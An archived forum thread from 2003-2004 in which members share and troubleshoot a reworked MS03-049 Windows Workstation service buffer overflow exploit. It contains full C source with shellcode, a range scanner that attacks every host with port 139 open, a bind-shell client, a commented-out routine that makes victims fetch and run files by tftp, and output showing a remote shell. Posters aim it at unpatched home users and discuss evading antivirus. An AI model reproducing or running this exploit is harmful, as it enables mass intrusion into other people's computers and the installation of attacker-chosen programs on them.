Ms03-049 Recode

Help - Search - Member List - Calendar

Full Version: Ms03-049 Recode

GovernmentSecurity.org > The Archives > Public Downloads

Pages: 1, 2

wh173r

Dec 21 2003, 05:39 AM

makes sense :-)

jak3c

Dec 21 2003, 07:34 AM

hummm let me test it !
good way to hack...
very good !

UnDeRTaKeR

Dec 21 2003, 10:18 AM

it's way to slow

T-BoNe

Dec 21 2003, 10:55 AM

QUOTE (UnDeRTaKeR @ Dec 21 2003, 10:18 AM)

it's way to slow

to slow ? who cares about that

UnDeRTaKeR

Dec 21 2003, 11:34 AM

QUOTE (T-BoNe @ Dec 21 2003, 10:55 AM)

QUOTE (UnDeRTaKeR @ Dec 21 2003, 10:18 AM)

it's way to slow

to slow ? who cares about that

well, i care about it cause if i wanna scan a big range, it will take me a life!

GhostCow

Dec 21 2003, 11:47 AM

undertaker, try setting up winshell or something on some nt boxes, then run the file through all the shells at the same time on different ranges... did i help you?

UnDeRTaKeR

Dec 21 2003, 11:53 AM

umm N0! it's still a long waiting!

GhostCow

Dec 21 2003, 12:01 PM

sweet slynx!
i r baboon
in comparison

T-BoNe

Dec 21 2003, 12:33 PM

aaaaarf, more ip's, i need moooooore ip's, i need a result, loosing my hope in this exploit

Kpz

Dec 24 2003, 07:08 PM

First, props to slynx this is top code

I've reworked the code a little - it seems on some systems it wouldn't connect to the remote system and chucked out an error like:

CODE

System error 53 has occurred.

The network path was not found.

So I swapped out the system("net use..."); code to use WNetAddConnection2 to create the nullsession which seems to be preventing the errors.

I've also added the -p flag, whereby it dosen't bother checking for ping reply, it just trys to connect. (And its very, very, slow.)

Im intergrating RPC and Messenger service exploit code into this now, but I thought I'd put it up here now as tomorrow is Christmas day, and that means lots of kids with no idea what Windows Update is are getting new computers

Heads up: If you recompile this, use the release profile not debug else you'll get errors about incorrect handling of ESP at runtime.

Heads up: This *does* work, I've got a few shells with it. Where it says "connect() failed" that just means that the exploit failed, keep running with it and it'll get you a shell eventually.

Im tempted to write something simmilar to this but that supports plugins - put in an exploit plugin and it'll scan for computers vulnerable and automatically run a batch script of your choosing on the remote system. It would save me a little bit of typing

CODE

/*
ms03-049 wkksvc.dll buffer overflow - recode
scanning is slow.... i'm not good w/ threads...
*/

#include <windows.h>
#include <winbase.h>
#include <lm.h>
#include "LMJoin.h"
#include <winnls.h>
#include <stdio.h>
#include <string.h>
#include "CPing.h"
#include <stdlib.h>
#include <process.h>
#include <io.h>
#include <iostream>
#include <ctime>
#include <cstdlib>

using namespace std;

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "mpr")

long gimmeip(char* hostname);
void scanip(char* startip, char* endip);
void gotoshell(void);
void doshell(int sock);

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

char* targetiptmp;
bool dontping = false;

typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL, IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL, IN ULONG Reserved);
int main(int argc, char** argv)
{
if (argc < 2) {
fprintf(stderr,
"\n[+] -> MS03-049 wkksvc.dll Buffer Overflow (exploit only)\n");
fprintf(stderr,
"[+] -> This is private copy... and requires a large towel :)\n");
fprintf(stderr,
"[+] -> Tweaked by Kp (24th Dec 03) to make the sod work;]\n");
fprintf(stderr,
"[+] -> Props to slynx for the original code.\n");
fprintf(stderr,
"[+] -> Usage = %s <start ip> [end ip] [-p]\n", argv[0]);
exit(1);
}

fprintf(stderr,
"\n[+] -> MS03-049 wkksvc.dll Buffer Overflow (exploit only)\n");
fprintf(stderr,
"[+] -> This is private copy... and requires a large towel :)\n");
fprintf(stderr,
"[+] -> Tweaked by Kp (24th Dec 03) to make the sod work;]\n");
fprintf(stderr,
"[+] -> Props to slynx for the original code.\n");

if (argc == 4) {
if (strstr(argv[3], "-p")) {
fprintf(stderr,
"[+] -> Not pinging.\n");
dontping = true;
}
}
if (argc < 3) {
scanip(argv[1], argv[1]);
} else {
scanip(argv[1], argv[2]);
}

printf("[+] -> Scanning finished.\n");
exit(0);
return(0);
}

DWORD WINAPI SploitThread(LPVOID lpParam)
{
char overwrite[2045] = "";
char sc[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

char exp_buf[2045 + 4 + 16 + 501];
char ip[30];
char netuse[100];
char* targetip = targetiptmp;
LPWSTR ipl[60];
LPSTR remotename[60];
DWORD jmpesp = 0x7518A747;
char unicode[(2045 + 4 + 16 + 501) * 2];
int i = 0;
int x = 0;
int len = 0;
int ret = 0;
NETRESOURCE nr;
HINSTANCE hinstLib;
MYPROC ProcAddr;
BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

printf("[+] %s: Attacking, attempting a null session.\n", targetip);

/* Lets do it how MS want it done... */
sprintf((char*) remotename, "\\\\%s\\IPC$", targetip);
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = (char*) remotename;
nr.dwType = RESOURCETYPE_ANY;
ret = WNetAddConnection2(&nr, "", "", 0); // attempt a null session

if (ret == 0) {
printf("[+] %s: Success.\n", targetip);
} else {
printf("[x] %s: Failed.\n", targetip);
ExitThread(0);
return 1;
}

_snprintf(ip, 24, "\\\\%s", targetip);
hinstLib = LoadLibrary("netapi32.dll");

memset(overwrite, 0x41, 2000);
memset(overwrite + 2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf + 2044, &jmpesp, 4);
memset(exp_buf + 2048, 0x90, 16);
memcpy(exp_buf + 2064, sc, sizeof(sc));
memset(unicode, 0x00, sizeof(unicode));
for (x = 0, i = 0; i <= sizeof(unicode); x++, i += 2) {
unicode[i] = exp_buf[x];
}
MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short *) ipl, 60);

if (hinstLib != NULL) {
ProcAddr = (MYPROC) GetProcAddress(hinstLib,
"NetAddAlternateComputerName");
if (NULL != ProcAddr) {
fRunTimeLinkSuccess = TRUE;
printf("[+] %s: GetProcAddr: %x.\n", targetip, *ProcAddr);
printf("[+] %s: Sending exploit.\n", targetip);
(ProcAddr)
((LPCWSTR) ipl, (const unsigned short *) unicode, NULL, NULL,
0);
} else {
printf("\n[x] %s: The value of ProcAddr is null.\n", targetip);
}
fFreeResult = FreeLibrary(hinstLib);
} else {
printf("[x] %s: The value of hinstLib is null. Got netapi32.dll?\n",
targetip);
}

ExitThread(0);
return 1;
}

long gimmeip(char* hostname)
{
struct hostent* he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
printf("[x] %s: getbyhostname() failed.\n", hostname);

WSACleanup();
return NULL;
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
void scanip(char* startip, char* endip)
{
unsigned long start;
unsigned long end;
unsigned long counter;
DWORD dwThreadId, dwThrdParam = 1;
CPing ping;
WSADATA wsaData;
WSAStartup(MAKEWORD(1, 1), &wsaData);
SOCKET sock;
SOCKADDR_IN host;
char* curtarget;
int ports = 139;
bool bResult;

start = inet_addr(startip);
end = inet_addr(endip);

printf("[+] Begin scanning %s to %s.\n", startip, endip);

for (counter = ntohl(start); counter <= ntohl(end); counter++) {
host.sin_family = AF_INET;
host.sin_port = htons(ports);
host.sin_addr.s_addr = htonl(counter);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
curtarget = inet_ntoa(host.sin_addr);
if (dontping) {
bResult = true;
} else {
bResult = ping.Ping(curtarget);
}

if (bResult) {
printf("[+] %s: Assuming alive, checking 139.\n", curtarget);
if ((connect(sock, (SOCKADDR *) &host, sizeof(host))) == -1) {
printf("[x] %s: 139 filtered, moving on.\n", curtarget);
closesocket(sock);
} else {
printf("[+] %s: 139 open, creating exploit thread.\n",
curtarget);

closesocket(sock);

targetiptmp = curtarget;
CreateThread(NULL, 0, SploitThread, &dwThrdParam, 0,
&dwThreadId);
gotoshell();
}
} else {
printf("[x] %s: Offline.\n", curtarget);
}
}
return;
}
void gotoshell(void)
{
WSADATA wsdata;
int sock;
char* targetip = targetiptmp;
unsigned short port = 4444;
struct sockaddr_in target;
unsigned long daip;

printf("[+] %s: Waiting.\n", targetip);

Sleep(4000);

if (WSAStartup(MAKEWORD(2, 0), &wsdata) != 0) {
printf("[x] %s: WSAStartup() failed.\n", targetip);
WSACleanup();
return;
}

if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
printf("[x] %s: socket() failed.\n");
WSACleanup();
return;
}

//printf("[+] Connection socket initialized ...\n");

daip = gimmeip(targetip);
memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = daip;
target.sin_port = htons(port);

printf("[+] %s: Connecting to port %d.\n", targetip, port);

if (connect(sock, (struct sockaddr *) &target, sizeof(target)) != 0) {
printf("[x] %s: connect() to bindshell failed.\n", targetip);

WSACleanup();
return;
} else {
printf("[+] %s: Kickass, mofo. Connected to shell on port %d.\n",
targetip, port);
doshell(sock);

//doautohack(sock);

printf("[+] %s: Closing socket.\n", targetip);
closesocket(sock);
WSACleanup();
}
return;
}
/*
void doautohack(int sock)
{
char cmd1[150];
char cmd2[150];
char cmd3[150];
char cmd4[150];
char cmd5[150];
char tmp[512];
char locn[255];
char *locip;
gethostname(locn, 255);
locip = inet_ntoa(*(struct in_addr *)*gethostbyname(locn)->h_addr_list);
Sleep(5000);
sprintf(cmd1, "tftp -i %s get file1.exe", locip);
sprintf(cmd2, "\r\ntftp -i %s get file2.exe", locip);
sprintf(cmd3, "\r\ntftp -i %s get file3.exe", locip);
sprintf(cmd5, "\r\ntftp -i %s get file4.bat", locip);
sprintf(cmd4, "\r\nfile4.bat.bat");
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd1);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd2);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd3);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd5);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd4);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
send(sock,"\n",sizeof("\n"),0);
Sleep(500);
return;
}
*/
void doshell(int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1) {
ul[0] = 1;
ul[1] = sock;

l = select(0, (fd_set *) &ul, NULL, NULL, &time);
if (l == 1) {
l = recv(sock, buf, sizeof(buf), 0);
if (l <= 0) {
return;
}
l = write(1, buf, l);
if (l <= 0) {
return;
}
} else {
l = read(0, buf, sizeof(buf));
if (l <= 0) {
return;
}
l = send(sock, buf, l, 0);
if (strncmp(buf, "exit", strlen("exit")) == 0) {
return;
}
if (l <= 0) {
return;
}
}
}
}

CODE

D:\sploits\ms03049\Release>ms03049 xx.xx.xx.214 xx.xx.xx.214 -p
[+] -> MS03-049 wkksvc.dll Buffer Overflow (exploit only)
[+] -> This is private copy... and requires a large towel :)
[+] -> Tweaked by Kp (24th Dec 03) to make the sod work;]
[+] -> Props to slynx for the original code.
[+] -> Not pinging.
[+] Begin scanning xx.xx.xx.214 to xx.xx.xx.214.
[+] xx.xx.xx.xx: Assuming alive, checking 139.
[+] xx.xx.xx.xx: 139 open, creating exploit thread.
[+] xx.xx.xx.xx: Waiting.
[+] xx.xx.xx.xx: Attacking, attempting a null session.
[+] xx.xx.xx.xx: Success.
[+] xx.xx.xx.xx: GetProcAddr: 71c59530.
[+] xx.xx.xx.xx: Sending exploit.
[+] xx.xx.xx.xx: Connecting to port 4444.
[+] xx.xx.xx.xx: Kickass, mofo. Connected to shell on port 4444.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
...

Its Christmas Eve and im working on code, Im a hardcore geek >_<

Merry Christmas all

Kpz

Dec 24 2003, 07:11 PM

Ack, bug. Lemme just fix that

Bug fixed, my local test IP (192.168.0.3) was hard coded, but I've replaced it now - what I dont understand... I've been getting remote shells with this

with it attaching to a local IP.

Double-=V=-

Dec 24 2003, 09:48 PM

Thanks Merry Xmas to you too!

GhostCow

Dec 24 2003, 10:20 PM

sweet posts you guys!

merry christmas & chanuka to all!

what does system error 59 stand for? (with the original slynx exploit)

s3xymoon

Dec 26 2003, 12:32 AM

helo em when i compile that i get a few errors #include "LMJoin.h"
#include "CPing.h" that files are mising so if u so good cangat code for that to ?

tnx

zero-maitimax

Dec 26 2003, 01:29 AM

ppl i still have the problem with norton...

when i connected to computer with norton it get msg
somebody wanne connected one rpc
(ppl that watch the news know about hte rpc bug)
then you have a reall problem..( a friend in china traied it and he got a warning to stop doing what he was doing)

any idea to by pass it?

flame

Dec 26 2003, 01:39 AM

kpz
how come your
GetProcAddr: 71c59530.
is diffrent then the original one?
GetProcAddr: 71c5679e

toxin

Dec 26 2003, 11:07 AM

yeah m8te tested it and it works

Kpz

Dec 26 2003, 11:15 AM

QUOTE

what does system error 59 stand for? (with the original slynx exploit)

IIRC its "Network name cannot be found", it occurs because Windows cannot map the name.

QUOTE

helo em when i compile that i get a few errors #include "LMJoin.h"
#include "CPing.h" that files are mising so if u so good cangat code for that to ?

tnx

This is a rework... the original files (the ones you need) are in the zip attached to slynx's post.

QUOTE

Yea - if Norton moans when RPC trys to connect out on a port, you could mod the shellcode to inject itself into another (trusted) process (anyone ever tried this?)

QUOTE

kpz
how come your
GetProcAddr: 71c59530.
is diffrent then the original one?
GetProcAddr: 71c5679e

Good question

different versions of netapi32?

Thanks.

GhostCow

Dec 26 2003, 11:26 AM

kpz why cant my windoze XP SP0 map the network name ?
i got a switch hub enabled and im the server... if i disable it will it make any difference?

zero-maitimax

Dec 26 2003, 01:53 PM

QUOTE

Yea - if Norton moans when RPC trys to connect out on a port, you could mod the shellcode to inject itself into another (trusted) process (anyone ever tried this?)

do you have more info about this?

Kpz

Dec 26 2003, 04:10 PM

QUOTE (zero-maitimax @ Dec 26 2003, 01:53 PM)

QUOTE

Yea - if Norton moans when RPC trys to connect out on a port, you could mod the shellcode to inject itself into another (trusted) process (anyone ever tried this?)

do you have more info about this?

Hi

Some of the sources in here may help you out. I've never done it, and I dont know assembly well enough to try it

Kpz

Dec 26 2003, 04:12 PM

QUOTE (GhostCow @ Dec 26 2003, 11:26 AM)

kpz why cant my windoze XP SP0 map the network name ?
i got a switch hub enabled and im the server... if i disable it will it make any difference?

Are you talking generally or using this exploit?

If your talking about the exploit: Use my version of it, WNetAddConnection() seems more stable than slynxs system() method, second, you may need protocols like NetBIOS installed and enabled, but I'm not all too sure about that one.

GhostCow

Dec 27 2003, 12:21 AM

thanks kpz

daTh0r

Dec 27 2003, 12:22 AM

i got some weird problems with but now they are gone thx 2 you Kpz

zero-maitimax

Dec 27 2003, 07:16 PM

QUOTE (Kpz @ Dec 26 2003, 04:10 PM)

QUOTE (zero-maitimax @ Dec 26 2003, 01:53 PM)

QUOTE

Yea - if Norton moans when RPC trys to connect out on a port, you could mod the shellcode to inject itself into another (trusted) process (anyone ever tried this?)

do you have more info about this?

Hi

Some of the sources in here may help you out. I've never done it, and I dont know assembly well enough to try it

aphex??!!? if that's the dude i think it is i contected him..

Kpz

Dec 28 2003, 03:49 PM

Aphex is the guy who owns that site.

I dont know him... just thought the sources might help you, not him

skorpio

Dec 28 2003, 03:56 PM

anyone know a scanner for this exploit, only scanner no autohacker....

Thx for the share, bye

Kpz

Dec 28 2003, 04:03 PM

Any of the decent security scanners should pick this up - GFI, Retina, MS BSA, Nessus etc etc...

You could just swap the shellcode for one that lets you know it worked, not one that binds a shell.

poldi

Dec 29 2003, 10:30 AM

hmm i am not a C guru so i cant do it myself.

[x] 213.7.1.220: Failed.
[+] 213.7.1.220: Connecting to port 4444.

hmm why does it try to connect even if it failed ?

Poldi

FakoLy

Dec 29 2003, 03:37 PM

nice thanx to share this

PegHorse

Dec 29 2003, 09:46 PM

Hehe nice code !!
Thanks for all ;-)

Kpz

Dec 30 2003, 12:09 PM

QUOTE (poldi @ Dec 29 2003, 10:30 AM)

hmm i am not a C guru so i cant do it myself.

[x] 213.7.1.220: Failed.
[+] 213.7.1.220: Connecting to port 4444.

hmm why does it try to connect even if it failed ?

Thats a bug I was way to lazy to fix

If you move the line that says: gotoshell() after the call to CreateThread(...) to after the line that looks like this: (ProcAddr) ((LPCWSTR) ipl, ...

Then it shouldn't try to connect if it couldn't create a null session.

I can forsee another problem there though, so you'd best modify gotoshell(void) to take an argument that is the IP being exploited, else you may find it will (filtered) up

Gotisch

Jan 8 2004, 02:21 AM

It crashes the pc.

Fractured

Jan 21 2004, 12:33 AM

Ok, once you get a C:\ promt, what do you do?
Im testing it on a friends computer. How would I send programs to be run on his computer? Or can you just go around and run things as is?

Could you somehow open shares so that you could transfer that way?

claybutttz

Jan 21 2004, 04:46 AM

you would tftp files to remote computer. you would need to run a tftp server on your computer though ex: tftpd32.exe

jak3c

Jan 21 2004, 08:53 PM

very good job !
great fly to you....thanks you to share it with us

Fractured

Jan 22 2004, 08:23 AM

hey i get this error:

[+] -> MS03-049 wkksvc.dll Buffer Overflow (exploit only)
[+] -> This is private copy... and requires a large towel

[+] -> Tweaked by Kp (24th Dec 03) to make the sod work ;]
[+] -> Props to slynx for the original code.
[+] Begin scanning 10.105.4.XXX to 10.105.4.XXX.
[+] 10.105.4.190: Assuming alive, checking 139.
[+] 10.105.4.190: 139 open, creating exploit thread.
[+] 10.105.4.190: Waiting.
[+] 10.105.4.190: Attacking, attempting a null session.
[+] 10.105.4.190: Success.
[+] 10.105.4.190: GetProcAddr: 71c5679e.
[+] 10.105.4.190: Sending exploit.
[+] 10.105.4.190: Connecting to port 4444.
[x] 10.105.4.190: connect() to bindshell failed.
[+] -> Scanning finished.

is there some way to fix this or do it right?

Kpz

Jan 22 2004, 11:45 AM

Yes there is a way to fix it - use it on some vuln boxen

If you get connect() to bindshell failed, the the exploit failed on that IP. Keep scannin...

ADiCToJUeGO

Jan 25 2004, 11:34 AM

Thanks!

wh173r

Jan 28 2004, 05:26 PM

Actually, i think his pc dosent have netcat listening on port 4444, cause it fails at the bindshell.

Kpz

Jan 28 2004, 07:08 PM

It dosen't use nc, and it can't connect because the port is closed because the exploit failed like I said...

flashb4ck

Feb 2 2004, 08:20 PM

great thx 4 this n!ce tool

i will check it out

gr€€tZ fl4Shb4Ck

limbox

Feb 3 2004, 01:27 PM

thanks for your work

Double-=V=-

Feb 3 2004, 06:45 PM

Thanks this works very nice
On what versions of Windows does this work?
Winxp sp1 Eng? Or more?

ST.

Feb 8 2004, 12:47 PM

hmm, I got this:

...
[+] Kickass mofo. Connected to shell on port 4444.
and thats all. xploit is freezed. no commands from my side are allowed.

but it works. sometimes.

Kpz

Feb 8 2004, 06:19 PM

You probably hit against something that already had port 4444 open.

ST.

Feb 8 2004, 11:02 PM

QUOTE (Kpz @ Feb 8 2004, 06:19 PM)

You probably hit against something that already had port 4444 open.

no. port is clear. its a bug somewhere.

net_runner

Mar 18 2004, 03:02 PM

thankz man

XeLoRy

Mar 18 2004, 08:43 PM

real thanks, this exploit is realy fantastic

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.